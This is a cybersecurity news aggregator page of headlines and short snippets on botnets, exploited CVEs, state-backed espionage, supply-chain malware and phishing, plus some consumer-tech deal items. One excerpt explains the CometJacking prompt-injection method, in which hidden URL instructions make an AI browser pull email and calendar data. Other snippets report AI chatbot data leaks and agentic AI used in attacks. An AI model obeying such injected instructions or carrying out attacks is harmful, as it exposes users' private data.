Cybersecurity News

About This Website

Welcome to our cybersecurity news aggregator! This website gathers news articles from over 60 sources, providing you with a comprehensive and up-to-date overview of the latest happenings in the world of cybersecurity.

We utilize RSS feeds to collect the news, ensuring a streamlined and efficient process. This enables you to stay informed and access a wide variety of perspectives and insights in one convenient location.

Dive into the latest cybersecurity stories and explore the wealth of knowledge available, all in one place.

Cybersecurity News

RondoDox Exploits Unpatched XWiki Servers to Pull More Devices Into Its Botnet

The botnet malware known as RondoDox has been observed targeting unpatched XWiki instances that are vulnerable to a critical security flaw that could allow attackers to achieve arbitrary code execution. The vulnerability in question is CVE-2025-24893 (CVSS score: 9.8), an eval injection bug that could allow any guest user to perform arbitrary remote code execution through a request to the "/bin/get/Main/

Five Plead Guilty in U.S. for Helping North Korean IT Workers Infiltrate 136 Companies

The U.S. Department of Justice (DoJ) on Friday announced that five individuals have pleaded guilty to assisting North Korea's illicit revenue generation schemes by enabling information technology (IT) worker fraud in violation of international sanctions. The five individuals are listed below: Audricus Phagnasay, 24; Jason Salazar, 30; Alexander Paul Travis, 34; Oleksandr Didenko, 28; and Erick

North Korean Hackers Turn JSON Services into Covert Malware Delivery Channels

The North Korean threat actors behind the Contagious Interview campaign have once again tweaked their tactics by using JSON storage services to stage malicious payloads. "The threat actors have recently resorted to utilizing JSON storage services like JSON Keeper, JSONsilo, and npoint.io to host and deliver malware from trojanized code projects, with the lure," NVISO researchers Bart Parys, Stef

Researchers Find Serious AI Bugs Exposing Meta, Nvidia, and Microsoft Inference Frameworks

Cybersecurity researchers have uncovered critical remote code execution vulnerabilities impacting major artificial intelligence (AI) inference engines, including those from Meta, Nvidia, Microsoft, and open-source PyTorch projects such as vLLM and SGLang. "These vulnerabilities all traced back to the same root cause: the overlooked unsafe use of ZeroMQ (ZMQ) and Python's pickle deserialization,"

Iranian Hackers Launch ‘SpearSpecter’ Spy Operation on Defense & Government Targets

The Iranian state-sponsored threat actor known as APT42 has been observed targeting individuals and organizations that are of interest to the Islamic Revolutionary Guard Corps (IRGC) as part of a new espionage-focused campaign. The activity, detected in early September 2025 and assessed to be ongoing, has been codenamed SpearSpecter by the Israel National Digital Agency (INDA). "The

Ransomware's Fragmentation Reaches a Breaking Point While LockBit Returns

Key Takeaways: 85 active ransomware and extortion groups observed in Q3 2025, reflecting the most decentralized ransomware ecosystem to date. 1,590 victims disclosed across 85 leak sites, showing high, sustained activity despite law-enforcement pressure. 14 new ransomware brands launched this quarter, proving how quickly affiliates reconstitute after takedowns. LockBit’s reappearance with

Chinese Hackers Use Anthropic's AI to Launch Automated Cyber Espionage Campaign

State-sponsored threat actors from China used artificial intelligence (AI) technology developed by Anthropic to orchestrate automated cyber attacks as part of a "highly sophisticated espionage campaign" in mid-September 2025. "The attackers used AI's 'agentic' capabilities to an unprecedented degree – using AI not just as an advisor, but to execute the cyber attacks themselves," the AI upstart

Now-Patched Fortinet FortiWeb Flaw Exploited in Attacks to Create Admin Accounts

Cybersecurity researchers are sounding the alert about an authentication bypass vulnerability in the Fortinet FortiWeb Web Application Firewall (WAF) that could allow an attacker to take over admin accounts and completely compromise a device. "The watchTowr team is seeing active, indiscriminate in-the-wild exploitation of what appears to be a silently patched vulnerability in Fortinet's FortiWeb

Russian Hackers Create 4,300 Fake Travel Sites to Steal Hotel Guests' Payment Data

A Russian-speaking threat actor behind an ongoing, mass phishing campaign has registered more than 4,300 domain names since the start of the year. The activity, per Netcraft security researcher Andrew Brandt, is designed to target customers of the hospitality industry, specifically hotel guests who may have travel reservations, with spam emails. The campaign is said to have begun in earnest around

Fake Chrome Extension “Safery” Steals Ethereum Wallet Seed Phrases Using Sui Blockchain

Cybersecurity researchers have uncovered a malicious Chrome extension that poses as a legitimate Ethereum wallet but harbors functionality to exfiltrate users' seed phrases. The name of the extension is "Safery: Ethereum Wallet," with the threat actor describing it as a "secure wallet for managing Ethereum cryptocurrency with flexible settings." It was uploaded to the Chrome Web Store on

When Attacks Come Faster Than Patches: Why 2026 Will be the Year of Machine-Speed Security

The Race for Every New CVE Based on multiple 2025 industry reports: roughly 50 to 61 percent of newly disclosed vulnerabilities saw exploit code weaponized within 48 hours. Using the CISA Known Exploited Vulnerabilities Catalog as a reference, hundreds of software flaws are now confirmed as actively targeted within days of public disclosure. Each new announcement now triggers a global race

Operation Endgame Dismantles Rhadamanthys, Venom RAT, and Elysium Botnet in Global Crackdown

Malware families like Rhadamanthys Stealer, Venom RAT, and the Elysium botnet have been disrupted as part of a coordinated law enforcement operation led by Europol and Eurojust. The activity, which is taking place between November 10 and 13, 2025, marks the latest phase of Operation Endgame, an ongoing operation designed to take down criminal infrastructures and combat ransomware enablers

ThreatsDay Bulletin: Cisco 0-Days, AI Bug Bounties, Crypto Heists, State-Linked Leaks and 20 More Stories

Behind every click, there’s a risk waiting to be tested. A simple ad, email, or link can now hide something dangerous. Hackers are getting smarter, using new tools to sneak past filters and turn trusted systems against us. But security teams are fighting back. They’re building faster defenses, better ways to spot attacks, and stronger systems to keep people safe. It’s a constant race — every

CISA Flags Critical WatchGuard Fireware Flaw Exposing 54,000 Fireboxes to No-Login Attacks

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Wednesday added a critical security flaw impacting WatchGuard Fireware to its Known Exploited Vulnerabilities (KEV) catalog, based on evidence of active exploitation. The vulnerability in question is CVE-2025-9242 (CVSS score: 9.3), an out-of-bounds write vulnerability affecting Fireware OS 11.10.2 up to and including

Over 67,000 Fake npm Packages Flood Registry in Worm-Like Spam Attack

Cybersecurity researchers are calling attention to a large-scale spam campaign that has flooded the npm registry with thousands of fake packages since early 2024 as part of a likely financially motivated effort. "The packages were systematically published over an extended period, flooding the npm registry with junk packages that survived in the ecosystem for almost two years," Endor Labs

Google Sues China-Based Hackers Behind $1 Billion Lighthouse Phishing Platform

Google has filed a civil lawsuit in the U.S. District Court for the Southern District of New York (SDNY) against China-based hackers who are behind a massive Phishing-as-a-Service (PhaaS) platform called Lighthouse that has ensnared over 1 million users across 120 countries. The PhaaS kit is used to conduct large-scale SMS phishing attacks that exploit trusted brands like E-ZPass and USPS to

Amazon Uncovers Attacks Exploited Cisco ISE and Citrix NetScaler as Zero-Day Flaws

Amazon's threat intelligence team on Wednesday disclosed that it observed an advanced threat actor exploiting two then-zero-day security flaws in Cisco Identity Service Engine (ISE) and Citrix NetScaler ADC products as part of attacks designed to deliver custom malware. "This discovery highlights the trend of threat actors focusing on critical identity and network access control infrastructure –

[Webinar] Learn How Leading Security Teams Reduce Attack Surface Exposure with DASR

Every day, security teams face the same problem—too many risks, too many alerts, and not enough time. You fix one issue, and three more show up. It feels like you’re always one step behind. But what if there was a smarter way to stay ahead—without adding more work or stress? Join The Hacker News and Bitdefender for a free cybersecurity webinar to learn about a new approach called Dynamic Attack

Active Directory Under Siege: Why Critical Infrastructure Needs Stronger Security

Active Directory remains the authentication backbone for over 90% of Fortune 1000 companies. AD's importance has grown as companies adopt hybrid and cloud infrastructure, but so has its complexity. Every application, user, and device traces back to AD for authentication and authorization, making it the ultimate target. For attackers, it represents the holy grail: compromise Active

Microsoft Fixes 63 Security Flaws, Including a Windows Kernel Zero-Day Under Active Attack

Microsoft on Tuesday released patches for 63 new security vulnerabilities identified in its software, including one that has come under active exploitation in the wild. Of the 63 flaws, four are rated Critical and 59 are rated Important in severity. Twenty-nine of these vulnerabilities are related to privilege escalation, followed by 16 remote code execution, 11 information disclosure, three

Google Launches 'Private AI Compute' — Secure AI Processing with On-Device-Level Privacy

Google on Tuesday unveiled a new privacy-enhancing technology called Private AI Compute to process artificial intelligence (AI) queries in a secure platform in the cloud. The company said it has built Private AI Compute to "unlock the full speed and power of Gemini cloud models for AI experiences, while ensuring your personal data stays private to you and is not accessible to anyone else, not

WhatsApp Malware 'Maverick' Hijacks Browser Sessions to Target Brazil's Biggest Banks

Threat hunters have uncovered similarities between a banking malware called Coyote and a newly disclosed malicious program dubbed Maverick that has been propagated via WhatsApp. According to a report from CyberProof, both malware strains are written in .NET, target Brazilian users and banks, and feature identical functionality to decrypt targeted banking URLs and monitor banking applications.

GootLoader Is Back, Using a New Font Trick to Hide Malware on WordPress Sites

The malware known as GootLoader has resurfaced yet again after a brief spike in activity earlier this March, according to new findings from Huntress. The cybersecurity company said it observed three GootLoader infections since October 27, 2025, out of which two resulted in hands-on keyboard intrusions with domain controller compromise taking place within 17 hours of initial infection. "

CISO's Expert Guide To AI Supply Chain Attacks

AI-enabled supply chain attacks jumped 156% last year. Discover why traditional defenses are failing and what CISOs must do now to protect their organizations. Download the full CISO’s expert guide to AI supply chain attacks here. TL;DR: AI-enabled supply chain attacks are exploding in scale and sophistication - Malicious package uploads to open-source repositories jumped 156% in

Npm Package Targeting GitHub-Owned Repositories Flagged as Red Team Exercise

Cybersecurity researchers have discovered a malicious npm package named "@acitons/artifact" that typosquats the legitimate "@actions/artifact" package with the intent to target GitHub-owned repositories. "We think the intent was to have this script execute during a build of a GitHub-owned repository, exfiltrate the tokens available to the build environment, and then use those tokens to publish

Android Trojan 'Fantasy Hub' Malware Service Turns Telegram Into a Hub for Hackers

Cybersecurity researchers have disclosed details of a new Android remote access trojan (RAT) called Fantasy Hub that's sold on Russian-speaking Telegram channels under a Malware-as-a-Service (MaaS) model. According to its seller, the malware enables device control and espionage, allowing threat actors to collect SMS messages, contacts, call logs, images, and videos, as well as intercept, reply,

Hackers Exploiting Triofox Flaw to Install Remote Access Tools via Antivirus Feature

Google's Mandiant Threat Defense on Monday said it discovered n-day exploitation of a now-patched security flaw in Gladinet's Triofox file-sharing and remote access platform. The critical vulnerability, tracked as CVE-2025-12480 (CVSS score: 9.1), allows an attacker to bypass authentication and access the configuration pages, resulting in the upload and execution of arbitrary payloads. The

Konni Hackers Turn Google’s Find Hub into a Remote Data-Wiping Weapon

The North Korea-affiliated threat actor known as Konni (aka Earth Imp, Opal Sleet, Osmium, TA406, and Vedalia) has been attributed to a new set of attacks targeting both Android and Windows devices for data theft and remote control. "Attackers impersonated psychological counselors and North Korean human rights activists, distributing malware disguised as stress-relief programs," the Genians

⚡ Weekly Recap: Hyper-V Malware, Malicious AI Bots, RDP Exploits, WhatsApp Lockdown and More

Cyber threats didn’t slow down last week—and attackers are getting smarter. We’re seeing malware hidden in virtual machines, side-channel leaks exposing AI chats, and spyware quietly targeting Android devices in the wild. But that’s just the surface. From sleeper logic bombs to a fresh alliance between major threat groups, this week’s roundup highlights a clear shift: cybercrime is evolving fast

New Browser Security Report Reveals Emerging Threats for Enterprises

According to the new Browser Security Report 2025, security leaders are discovering that most identity, SaaS, and AI-related risks converge in a single place, the user’s browser. Yet traditional controls like DLP, EDR, and SSE still operate one layer too low. What’s emerging isn’t just a blindspot. It’s a parallel threat surface: unmanaged extensions acting like supply chain implants, GenAI

Large-Scale ClickFix Phishing Attacks Target Hotel Systems with PureRAT Malware

Cybersecurity researchers have called attention to a massive phishing campaign targeting the hospitality industry that lures hotel managers to ClickFix-style pages and harvests their credentials by deploying malware like PureRAT. "The attacker's modus operandi involved using a compromised email account to send malicious messages to multiple hotel establishments," Sekoia said. "This campaign

GlassWorm Malware Discovered in Three VS Code Extensions with Thousands of Installs

Cybersecurity researchers have disclosed a new set of three extensions associated with the GlassWorm campaign, indicating continued attempts on the part of threat actors to target the Visual Studio Code (VS Code) ecosystem. The extensions in question, which are still available for download, are listed below: ai-driven-dev.ai-driven-dev (3,402 downloads), adhamu.history-in-sublime-merge (4,057

Microsoft Uncovers 'Whisper Leak' Attack That Identifies AI Chat Topics in Encrypted Traffic

Microsoft has disclosed details of a novel side-channel attack targeting remote language models that could enable a passive adversary with capabilities to observe network traffic to glean details about model conversation topics despite encryption protections under certain circumstances. This leakage of data exchanged between humans and streaming-mode language models could pose serious risks to

Samsung Mobile Flaw Exploited as Zero-Day to Deploy LANDFALL Android Spyware

A now-patched security flaw in Samsung Galaxy Android devices was exploited as a zero-day to deliver a "commercial-grade" Android spyware dubbed LANDFALL in targeted attacks in the Middle East. The activity involved the exploitation of CVE-2025-21042 (CVSS score: 8.8), an out-of-bounds write flaw in the "libimagecodec.quram.so" component that could allow remote attackers to execute arbitrary

From Log4j to IIS, China’s Hackers Turn Legacy Bugs into Global Espionage Tools

A China-linked threat actor has been attributed to a cyber attack targeting a U.S. non-profit organization with an aim to establish long-term persistence, as part of broader activity aimed at U.S. entities that are linked to or involved in policy issues. The organization, according to a report from Broadcom's Symantec and Carbon Black teams, is "active in attempting to influence U.S. government

Hidden Logic Bombs in Malware-Laced NuGet Packages Set to Detonate Years After Installation

A set of nine malicious NuGet packages has been identified as capable of dropping time-delayed payloads to sabotage database operations and corrupt industrial control systems. According to software supply chain security company Socket, the packages were published in 2023 and 2024 by a user named "shanhai666" and are designed to run malicious code after specific trigger dates in August 2027 and

Enterprise Credentials at Risk – Same Old, Same Old?

Imagine this: Sarah from accounting gets what looks like a routine password reset email from your organization’s cloud provider. She clicks the link, types in her credentials, and goes back to her spreadsheet. But unknown to her, she’s just made a big mistake. Sarah just accidentally handed over her login details to cybercriminals who are laughing all the way to their dark web

Google Launches New Maps Feature to Help Businesses Report Review-Based Extortion Attempts

Google on Thursday said it's rolling out a dedicated form to allow businesses listed on Google Maps to report extortion attempts made by threat actors who post inauthentic bad reviews on the platform and demand ransoms to remove the negative comments. The approach is designed to tackle a common practice called review bombing, where online users intentionally post negative user reviews in an

Vibe-Coded Malicious VS Code Extension Found with Built-In Ransomware Capabilities

Cybersecurity researchers have flagged a malicious Visual Studio Code (VS Code) extension with basic ransomware capabilities that appears to be created with the help of artificial intelligence – in other words, vibe-coded. Secure Annex researcher John Tuckner, who flagged the extension "susvsex," said it does not attempt to hide its malicious functionality. The extension was uploaded on

Trojanized ESET Installers Drop Kalambur Backdoor in Phishing Attacks on Ukraine

A previously unknown threat activity cluster has been observed impersonating Slovak cybersecurity company ESET as part of phishing attacks targeting Ukrainian entities. The campaign, detected in May 2025, is tracked by the security outfit under the moniker InedibleOchotense, describing it as Russia-aligned. "InedibleOchotense sent spear-phishing emails and Signal text messages, containing a link

Cisco Warns of New Firewall Attack Exploiting CVE-2025-20333 and CVE-2025-20362

Cisco on Wednesday disclosed that it became aware of a new attack variant that's designed to target devices running Cisco Secure Firewall Adaptive Security Appliance (ASA) Software and Cisco Secure Firewall Threat Defense (FTD) Software releases that are susceptible to CVE-2025-20333 and CVE-2025-20362. "This attack can cause unpatched devices to unexpectedly reload, leading to denial-of-service

From Tabletop to Turnkey: Building Cyber Resilience in Financial Services

Introduction: Financial institutions are facing a new reality: cyber-resilience has passed from being a best practice, to an operational necessity, to a prescriptive regulatory requirement. Crisis management or tabletop exercises, for a long time relatively rare in the context of cybersecurity, have become required as a series of regulations has introduced this requirement for FSI organizations in

ThreatsDay Bulletin: AI Tools in Malware, Botnets, GDI Flaws, Election Attacks & More

Cybercrime has stopped being a problem of just the internet — it’s becoming a problem of the real world. Online scams now fund organized crime, hackers rent violence like a service, and even trusted apps or social platforms are turning into attack vectors. The result is a global system where every digital weakness can be turned into physical harm, economic loss, or political leverage.

Bitdefender Named a Representative Vendor in the 2025 Gartner® Market Guide for Managed Detection and Response

Bitdefender has once again been recognized as a Representative Vendor in the Gartner® Market Guide for Managed Detection and Response (MDR) — marking the fourth consecutive year of inclusion. According to Gartner, more than 600 providers globally claim to deliver MDR services, yet only a select few meet the criteria to appear in the Market Guide. While inclusion is not a ranking or comparative

Hackers Weaponize Windows Hyper-V to Hide Linux VM and Evade EDR Detection

The threat actor known as Curly COMrades has been observed exploiting virtualization technologies as a way to bypass security solutions and execute custom malware. According to a new report from Bitdefender, the adversary is said to have enabled the Hyper-V role on selected victim systems to deploy a minimalistic, Alpine Linux-based virtual machine. "This hidden environment, with its lightweight

SonicWall Confirms State-Sponsored Hackers Behind September Cloud Backup Breach

SonicWall has formally implicated state-sponsored threat actors as behind the September security breach that led to the unauthorized exposure of firewall configuration backup files. "The malicious activity – carried out by a state-sponsored threat actor – was isolated to the unauthorized access of cloud backup files from a specific cloud environment using an API call," the company said in a

Google Uncovers PROMPTFLUX Malware That Uses Gemini AI to Rewrite Its Code Hourly

Google on Wednesday said it discovered an unknown threat actor using an experimental Visual Basic Script (VB Script) malware dubbed PROMPTFLUX that interacts with its Gemini artificial intelligence (AI) model API to write its own source code for improved obfuscation and evasion. "PROMPTFLUX is written in VB Script and interacts with Gemini's API to request specific VBScript obfuscation and

Researchers Find ChatGPT Vulnerabilities That Let Attackers Trick AI Into Leaking Data

Cybersecurity researchers have disclosed a new set of vulnerabilities impacting OpenAI's ChatGPT artificial intelligence (AI) chatbot that could be exploited by an attacker to steal personal information from users' memories and chat histories without their knowledge. The seven vulnerabilities and attack techniques, according to Tenable, were found in OpenAI's GPT-4o and GPT-5 models. OpenAI has

Securing the Open Android Ecosystem with Samsung Knox

Raise your hand if you’ve heard the myth, “Android isn’t secure.” Android phones, such as the Samsung Galaxy, unlock new ways of working. But, as an IT admin, you may worry about the security—after all, work data is critical. However, outdated concerns can hold your business back from unlocking its full potential. The truth is, with work happening everywhere, every device connected to your

Mysterious 'SmudgedSerpent' Hackers Target U.S. Policy Experts Amid Iran–Israel Tensions

A never-before-seen threat activity cluster codenamed UNK_SmudgedSerpent has been attributed as behind a set of cyber attacks targeting academics and foreign policy experts between June and August 2025, coinciding with heightened geopolitical tensions between Iran and Israel. "UNK_SmudgedSerpent leveraged domestic political lures, including societal change in Iran and investigation into the

Google Sues to Disrupt Chinese SMS Phishing Triad

Google is suing more than two dozen unnamed individuals allegedly involved in peddling a popular China-based mobile phishing service that helps scammers impersonate hundreds of trusted brands, blast out text message lures, and convert phished payment card data into mobile wallets from Apple and Google.

Drilling Down on Uncle Sam’s Proposed TP-Link Ban

The U.S. government is reportedly preparing to ban the sale of wireless routers and other networking gear from TP-Link Systems, a tech company that currently enjoys an estimated 50% market share among home users and small businesses. Experts say while the proposed ban may have more to do with TP-Link's ties to China than any specific technical threats, much of the rest of the industry serving this market also sources hardware from China and ships products that are insecure fresh out of the box.

Cloudflare Scrubs Aisuru Botnet from Top Domains List

For the past week, domains associated with the massive Aisuru botnet have repeatedly usurped Amazon, Apple, Google and Microsoft in Cloudflare's public ranking of the most frequently requested websites. Cloudflare responded by redacting Aisuru domain names from their top websites list. The chief executive at Cloudflare says Aisuru's overlords are using the botnet to boost their malicious domain rankings, while simultaneously attacking the company's domain name system (DNS) service.

Alleged Jabber Zeus Coder ‘MrICQ’ in U.S. Custody

A Ukrainian man indicted in 2012 for conspiring with a prolific hacking group to steal tens of millions of dollars from U.S. businesses was arrested in Italy and is now in custody in the United States, KrebsOnSecurity has learned. Sources close to the investigation say Yuriy Igorevich Rybtsov, a 41-year-old from the Russia-controlled city of Donetsk, Ukraine, was previously referenced in U.S. federal charging documents only by his online handle "MrICQ." According to a 13-year-old indictment filed by prosecutors in Nebraska, MrICQ was a developer for a cybercrime group known as "Jabber Zeus."

Aisuru Botnet Shifts from DDoS to Residential Proxies

Aisuru, the botnet responsible for a series of record-smashing distributed denial-of-service (DDoS) attacks this year, recently was overhauled to support a more low-key, lucrative and sustainable business: renting hundreds of thousands of infected Internet of Things (IoT) devices to proxy services that help cybercriminals anonymize their traffic. Experts say a glut of proxies from Aisuru and other sources is fueling large-scale data harvesting efforts tied to various artificial intelligence (AI) projects, helping content scrapers evade detection by routing their traffic through residential connections that appear to be regular Internet users.

Read More
Canada Fines Cybercrime Friendly Cryptomus $176M

Financial regulators in Canada this week levied $176 million in fines against Cryptomus, a digital payments platform that supports dozens of Russian cryptocurrency exchanges and websites hawking cybercrime services. The penalties for violating Canada's anti-money-laundering laws come ten months after KrebsOnSecurity noted that Cryptomus's Vancouver street address was home to dozens of foreign currency dealers, money transfer businesses, and cryptocurrency exchanges — none of which were physically located there.

Read More
Email Bombs Exploit Lax Authentication in Zendesk

Cybercriminals are abusing a widespread lack of authentication in the customer service platform Zendesk to flood targeted email inboxes with menacing messages that come from hundreds of Zendesk corporate customers simultaneously.

Read More
Patch Tuesday, October 2025 ‘End of 10’ Edition

Microsoft today released software updates to plug a whopping 172 security holes in its Windows operating systems, including at least three vulnerabilities that are already being actively exploited. October's Patch Tuesday also marks the final month that Microsoft will ship security updates for Windows 10 systems. If you're running a Windows 10 PC and you're unable or unwilling to migrate to Windows 11, read on for other options.

Read More
DDoS Botnet Aisuru Blankets US ISPs in Record DDoS

The world's largest and most disruptive botnet is now drawing a majority of its firepower from compromised Internet-of-Things (IoT) devices hosted on U.S. Internet providers like AT&T, Comcast and Verizon, new evidence suggests. Experts say the heavy concentration of infected devices at U.S. providers is complicating efforts to limit collateral damage from the botnet's attacks, which shattered previous records this week with a brief traffic flood that clocked in at nearly 30 trillion bits of data per second.

Read More
ShinyHunters Wage Broad Corporate Extortion Spree

A cybercriminal group that used voice phishing attacks to siphon more than a billion records from Salesforce customers earlier this year has launched a website that threatens to publish data stolen from dozens of Fortune 500 firms if they refuse to pay a ransom. The group also claimed responsibility for a recent breach involving Discord user data, and for stealing terabytes of sensitive files from thousands of customers of the enterprise software maker Red Hat.

Read More
Friday Squid Blogging: Pilot Whales Eat a Lot of Squid

Short-finned pilot whales (Globicephala macrorhynchus) eat a lot of squid:

To figure out a short-finned pilot whale’s caloric intake, Gough says, the team had to combine data from a variety of sources, including movement data from short-lasting tags, daily feeding rates from satellite tags, body measurements collected via aerial drones, and sifting through the stomachs of unfortunate whales that ended up stranded on land.

Once the team pulled all this data together, they estimated that a typical whale will eat between 82 and 202 squid a day. To meet their energy needs, a whale will have to consume an average of 140 squid a day. Annually, that’s about 74,000 squid per whale. For all the whales in the area, that amounts to about 88,000 tons of squid eaten every year...

Read More
Upcoming Speaking Engagements

This is a current list of where and when I am scheduled to speak:

  • My coauthor Nathan E. Sanders and I are speaking at the Rayburn House Office Building in Washington, DC at noon ET on November 17, 2025. The event is hosted by the POPVOX Foundation and the topic is “AI and Congress: Practical Steps to Govern and Prepare.”
  • I’m speaking on “Integrity and Trustworthy AI” at North Hennepin Community College in Brooklyn Park, Minnesota, USA, on Friday, November 21, 2025, at 2:00 PM CT. The event is cohosted by the college and The Twin Cities IEEE Computer Society...

Read More
The Role of Humans in an AI-Powered World

As AI capabilities grow, we must delineate the roles that should remain exclusively human. The line seems to be between fact-based decisions and judgment-based decisions.

For example, in a medical context, if an AI was demonstrably better at reading a test result and diagnosing cancer than a human, you would take the AI in a second. You want the more accurate tool. But justice is harder because justice is inherently a human quality in a way that “Is this tumor cancerous?” is not. That’s a fact-based question. “What’s the right thing to do here?” is a human-based question...

Read More
Book Review: The Business of Secrets

The Business of Secrets: Adventures in Selling Encryption Around the World by Fred Kinch (May 24, 2024)

From the vantage point of today, it’s surreal reading about the commercial cryptography business in the 1970s. Nobody knew anything. The manufacturers didn’t know whether the cryptography they sold was any good. The customers didn’t know whether the crypto they bought was any good. Everyone pretended to know, thought they knew, or knew better than to even try to know.

The Business of Secrets is the self-published memoirs of Fred Kinch. He was founder and vice president of—mostly sales—at a US cryptographic hardware company called Datotek, from the company's founding in 1969 until 1982. It's mostly a disjointed collection of stories about the difficulties of selling to governments worldwide, along with descriptions of the highs and (mostly) lows of foreign airlines, foreign hotels, and foreign travel in general. But it's also about encryption...

Read More
On Hacking Back

Former DoJ attorney John Carlin writes about hackback, which he defines thus: "A hack back is a type of cyber response that incorporates a counterattack designed to proactively engage with, disable, or collect evidence about an attacker. Although hack backs can take on various forms, they are—by definition—not passive defensive measures."

His conclusion:

As the law currently stands, specific forms of purely defense measures are authorized so long as they affect only the victim’s system or data.

At the other end of the spectrum, offensive measures that involve accessing or otherwise causing damage or loss to the hacker’s systems are likely prohibited, absent government oversight or authorization. And even then parties should proceed with caution in light of the heightened risks of misattribution, collateral damage, and retaliation...

Read More
Prompt Injection in AI Browsers

This is why AIs are not ready to be personal assistants:

A new attack called ‘CometJacking’ exploits URL parameters to pass to Perplexity’s Comet AI browser hidden instructions that allow access to sensitive data from connected services, like email and calendar.

In a realistic scenario, no credentials or user interaction are required and a threat actor can leverage the attack by simply exposing a maliciously crafted URL to targeted users.

[…]

CometJacking is a prompt-injection attack where the query string processed by the Comet AI browser contains malicious instructions added using the ‘collection’ parameter of the URL...

Read More
New Attacks Against Secure Enclaves

Encryption can protect data at rest and data in transit, but does nothing for data in use. What we have are secure enclaves. I’ve written about this before:

Almost all cloud services have to perform some computation on our data. Even the simplest storage provider has code to copy bytes from an internal storage system and deliver them to the user. End-to-end encryption is sufficient in such a narrow context. But often we want our cloud providers to be able to perform computation on our raw data: search, analysis, AI model training or fine-tuning, and more. Without expensive, esoteric techniques, such as secure multiparty computation protocols or homomorphic encryption techniques that can perform calculations on encrypted data, cloud servers require access to the unencrypted data to do anything useful...

Read More
Friday Squid Blogging: Squid Game: The Challenge, Season Two

The second season of the Netflix reality competition show Squid Game: The Challenge has dropped. (Too many links to pick a few—search for it.)

As usual, you can also use this squid post to talk about the security stories in the news that I haven’t covered.

Blog moderation policy.

Read More
Faking Receipts with AI

Over the past few decades, it’s become easier and easier to create fake receipts. Decades ago, it required special paper and printers—I remember a company in the UK advertising its services to people trying to cover up their affairs. Then, receipts became computerized, and faking them required some artistic skills to make the page look realistic.

Now, AI can do it all:

Several receipts shown to the FT by expense management platforms demonstrated the realistic nature of the images, which included wrinkles in paper, detailed itemization that matched real-life menus, and signatures...

Read More
Rigged Poker Games

The Department of Justice has indicted thirty-one people over the high-tech rigging of high-stakes poker games.

In a typical legitimate poker game, a dealer uses a shuffling machine to shuffle the cards randomly before dealing them to all the players in a particular order. As set forth in the indictment, the rigged games used altered shuffling machines that contained hidden technology allowing the machines to read all the cards in the deck. Because the cards were always dealt in a particular order to the players at the table, the machines could determine which player would have the winning hand. This information was transmitted to an off-site member of the conspiracy, who then transmitted that information via cellphone back to a member of the conspiracy who was playing at the table, referred to as the “Quarterback” or “Driver.” The Quarterback then secretly signaled this information (usually by prearranged signals like touching certain chips or other items on the table) to other co-conspirators playing at the table, who were also participants in the scheme. Collectively, the Quarterback and other players in on the scheme (i.e., the cheating team) used this information to win poker games against unwitting victims, who sometimes lost tens or hundreds of thousands of dollars at a time. The defendants used other cheating technology as well, such as a chip tray analyzer (essentially, a poker chip tray that also secretly read all cards using hidden cameras), an x-ray table that could read cards face down on the table, and special contact lenses or eyeglasses that could read pre-marked cards. ...

Read More
Dig the analog watch look? I found a hybrid smartwatch that combines the best of both worlds

Withings' latest ScanWatch 2 embeds the company's health-tracking technology into a high-end, hybrid wearable.

Read More
Walmart will sell you this $89 LG UltraGear monitor for a limited time - but it won't last

This LG UltraGear display outputs lifelike visuals thanks to its 1080 resolution panel, 144Hz refresh rate, and HDR10 support.

Read More
Samsung fans won't like this: OnePlus just topped the S25 Ultra in more ways than one

I traveled with both Android flagships for a week. Here's how the OnePlus 15 still stands out.

Read More
I'm struggling to justify the AirPods Pro 3 when this model just set a record-low price

Despite the release of a new pair of AirPods, the Pro 2 remain a suitable option for many users. Get them now at their lowest price ever.

Read More
OnePlus 15 vs. Samsung Galaxy S25 Ultra: I've used both Android flagships, and here's who wins

Which phone deserves your hard-earned money this holiday season? Here's how to decide.

Read More
Walmart's Black Friday sale is officially here: I'm tracking my favorite discounts up to 60% off live

It's day two of Walmart's early Black Friday sale, with big discounts on AirPods, TVs, laptops, and more (don't miss your chance to save over $1,300 on a big-screen Samsung TV).

Read More
Best Buy just cut prices on dozens of Black Friday deals - I've hand-picked early discounts live now up to $800 off

Best Buy's holiday savings kicked off early in 2025, with savings on TVs, headphones, speakers, and more. These are my favorite deals available now, including the Dyson V11 vacuum for over $200 off.

Read More
Best Buy just cut the prices for dozens of Black Friday deals - I hand-picked 20+ early discounts live now

From TVs to earbuds, Best Buy's holiday savings kicked off early in 2025. These are my favorite deals available now, like four AirTags for only $80.

Read More
Google Brain founder Andrew Ng thinks you should still learn to code - here's why

ZDNET sat down with Andrew Ng at AI Dev 25 in New York to talk about developer futures, responsible AI, and why AGI is overhyped.

Read More
Withings' FDA-cleared smart thermometer does more than take your temp - what's new

The smart thermometer checks your temperature, as well as your cardiac and pulmonary health, in under a minute.

Read More
A week with this Oura Ring competitor killed my excitement - here's how things went

The Circular Ring 2 undercuts the Oura with a lower price and no subscription fees, but it achieves this by taking some questionable shortcuts.

Read More
I'm tired of the cheap Android tablet slander - this $200 one checks all the boxes for me

The Tabwee T60 Pro is a solid bang-for-buck tablet for Android users.

Read More
Don't be sad if your Amazon driver shows up with smart glasses on - they're actually helpful

Faster and safer deliveries are on the way.

Read More
A year later, here's why I keep coming back to the Surface Laptop (especially at this price)

Microsoft's Surface Laptop impresses with a sleek form factor and marathon battery. Right now, both the 13-inch and 15-inch are on sale for Black Friday.

Read More
5 ways to use your Chromecast TV beyond streaming shows (including a smart home hack)

Google's long-running streaming device is still useful for far more than binge-watching.

Read More
Are Black Friday TV deals actually worth it? They can be, if you know where to look

Are Black Friday TV deals legit? With a strict budget and a sharp eye, you can find decent discounts at retailers like Amazon, Best Buy, and more.

Read More
Apple, Microsoft, or Google: Whose platform authenticator rules our passkey future?

As we navigate the bumpy road from passwords to passkeys, the authenticator already in your system could define our passwordless future.

Read More
This smartwatch can monitor your blood pressure, but it's not for everyone - here's why

Wrist-based blood pressure monitoring is a developing technology, but the YHE BP Doctor Med is a product that could help some people.

Read More
Why this year-old Android smartwatch is still a prime option for most people (and it looks great)

The OnePlus Watch 2R is a trimmed-down version of the flagship, but still has some impressive specs.

Read More
Meta's Quest 3S is already a great value, and this new price drop makes it unbeatable

The Meta Quest 3S is a midrange VR headset with significant upgrades over the Quest 2, including improved hardware and features. It's currently on sale ahead of Black Friday.

Read More
Fortinet Confirms Active Exploitation of Critical FortiWeb Vulnerability

